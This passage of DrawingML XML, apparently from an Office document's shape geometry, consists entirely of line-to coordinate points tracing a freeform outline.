                  <a:pt x="10297" y="5625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10328" y="5615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10360" y="5634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10380" y="5605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10432" y="5625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10448" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10469" y="5750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10470" y="5750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10453" y="5820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10412" y="5965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10370" y="6016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10313" y="6077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10276" y="6170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10266" y="6241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10240" y="6353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10250" y="6520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10198" y="6632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10168" y="6674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10121" y="6764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10064" y="6776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10033" y="6828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9991" y="6969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9951" y="7020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9929" y="7104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9929" y="7174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913" y="7258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9894" y="7277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9857" y="7360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9836" y="7453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9842" y="7495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9821" y="7566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9795" y="7607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9790" y="7668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9784" y="7729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9816" y="7790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9831" y="7855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9826" y="7925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9831" y="7996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9836" y="8130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9826" y="8252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9810" y="8326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9816" y="8397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9800" y="8471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9769" y="8560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9743" y="8593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9774" y="8644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9800" y="8747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9790" y="8807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9800" y="8910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9805" y="8942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9826" y="8971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9826" y="8994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9842" y="9035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9868" y="9045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9899" y="9106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913" y="9125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9925" y="9157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9929" y="9218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9946" y="9250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9960" y="9270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9981" y="9321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10007" y="9404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10012" y="9507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10023" y="9558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10054" y="9629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10095" y="9680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10111" y="9690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10153" y="9783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10205" y="9857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10261" y="9959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10323" y="10020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10339" y="10020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10349" y="10020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10412" y="9969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10453" y="9927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10525" y="9908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10561" y="9908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10603" y="9937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10629" y="9937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10681" y="9979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10754" y="9947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10789" y="9895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10883" y="9815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10930" y="9783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10982" y="9764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11034" y="9764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11079" y="9764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11121" y="9857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11143" y="9959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11173" y="10040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11220" y="10040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11241" y="10011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11261" y="10020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11324" y="9969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11324" y="10011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11339" y="10030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11350" y="10091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11376" y="10113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11402" y="10203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11390" y="10306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11371" y="10460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11381" y="10482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11371" y="10585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11355" y="10688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11339" y="10729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11339" y="10768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11376" y="10912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11416" y="11025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11479" y="11159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11531" y="11304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11546" y="11406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11557" y="11448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11552" y="11477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11583" y="11560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11593" y="11653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11609" y="11785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11588" y="11836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11583" y="11868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11598" y="11949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11614" y="12032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11630" y="12083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11635" y="12167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11630" y="12270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11609" y="12330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="12424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11557" y="12475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11536" y="12597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11531" y="12658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11510" y="12783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11500" y="12905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11505" y="12988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11510" y="13091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11557" y="13222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11567" y="13306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11598" y="13470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11630" y="13582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11649" y="13633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11656" y="13707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11656" y="13871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11671" y="14076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11687" y="14179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11696" y="14310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11717" y="14413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11760" y="14516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11795" y="14692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11821" y="14804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11842" y="14917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11842" y="15019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11821" y="15042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11837" y="15132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11831" y="15215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11837" y="15257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11842" y="15234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11863" y="15298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11883" y="15298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11904" y="15350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11930" y="15350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11967" y="15298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12019" y="15276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12080" y="15225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12106" y="15234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12142" y="15215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12205" y="15247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12236" y="15215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12271" y="15234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12283" y="15196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12313" y="15183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12375" y="15132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12422" y="15071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12469" y="14990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12542" y="14846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12577" y="14743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12599" y="14670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12624" y="14599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12634" y="14580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12676" y="14506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12692" y="14445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12702" y="14333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12723" y="14230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12728" y="14156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12712" y="14147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12707" y="14086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12733" y="14034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806" y="13964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12858" y="13922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12884" y="13871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12893" y="13810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12879" y="13787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12888" y="13726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12893" y="13591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12884" y="13604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12884" y="13563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12874" y="13479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12848" y="13376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12853" y="13283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12879" y="13255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12926" y="13161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12952" y="13142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13023" y="12998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13091" y="12937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13148" y="12886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13190" y="12802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13216" y="12709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13237" y="12616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13225" y="12555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13225" y="12340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13220" y="12218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13225" y="12083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13216" y="12022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13195" y="11990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13173" y="11859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13152" y="11775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13159" y="11714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13152" y="11673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13169" y="11589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13169" y="11560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13133" y="11509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13126" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13159" y="11262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13185" y="11220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13195" y="11127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13216" y="11076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13225" y="10986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13246" y="10973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13263" y="10912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13303" y="10861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13319" y="10832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13334" y="10758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13402" y="10595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13458" y="10492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13548" y="10357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13609" y="10245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13677" y="10062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13729" y="9908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13781" y="9712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13816" y="9536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13842" y="9382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13859" y="9241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13868" y="9189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13868" y="9116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13873" y="9035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13873" y="8994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13852" y="8994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13826" y="9045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13795" y="9055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13769" y="9074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13748" y="9074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13713" y="9074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13692" y="9096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13661" y="9106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13609" y="9148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13541" y="9167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13484" y="9199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13454" y="9199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13428" y="9138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13418" y="9087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13397" y="9064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13371" y="9022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13407" y="8994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13407" y="8933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13392" y="8891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13360" y="8849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13340" y="8798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13303" y="8714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13267" y="8634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13185" y="8499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13148" y="8439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13126" y="8317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13086" y="8163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13049" y="8111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13023" y="8079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12997" y="7916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12987" y="7771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12997" y="7752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12977" y="7617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12966" y="7585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12893" y="7463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12888" y="7370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12900" y="7351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12841" y="7197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12822" y="7123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12796" y="7052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12744" y="6837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12702" y="6703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12671" y="6558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12676" y="6549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12728" y="6744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12759" y="6805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12780" y="6847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12790" y="6828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806" y="6754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12816" y="6651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12832" y="6600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12837" y="6622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12832" y="6674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12832" y="6725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12827" y="6796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12858" y="6796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12893" y="6889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12935" y="7001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12961" y="7104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12977" y="7113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12997" y="7187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12997" y="7216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13018" y="7299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13049" y="7328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13081" y="7380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13122" y="7534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13122" y="7617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13133" y="7710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13173" y="7842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13199" y="7864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13246" y="7957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13267" y="8070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13303" y="8182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13334" y="8233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13340" y="8284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13360" y="8326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13371" y="8387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13376" y="8448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13371" y="8480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13381" y="8541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13371" y="8551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13392" y="8602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13407" y="8705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13418" y="8747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13418" y="8817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13433" y="8901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13475" y="8910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13496" y="8891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13527" y="8891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13536" y="8859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13552" y="8849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13562" y="8807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13578" y="8798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13630" y="8788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13666" y="8756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13703" y="8695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13722" y="8705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13748" y="8695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13800" y="8602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13894" y="8541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13951" y="8480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13951" y="8429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13962" y="8368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14003" y="8326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14029" y="8317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14066" y="8275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14097" y="8284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14123" y="8243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14123" y="8191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14144" y="8163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14179" y="8163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14189" y="8130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14195" y="8070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14231" y="8018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14257" y="8018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14262" y="7996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14252" y="7906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14257" y="7832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14267" y="7803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14293" y="7813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14309" y="7720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14330" y="7678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14335" y="7636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14351" y="7556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14351" y="7524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14330" y="7505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14309" y="7463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14278" y="7380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14241" y="7360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14195" y="7341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14158" y="7290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14127" y="7197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14111" y="7094"/>
                </a:lnTo>
                <a:lnTo>
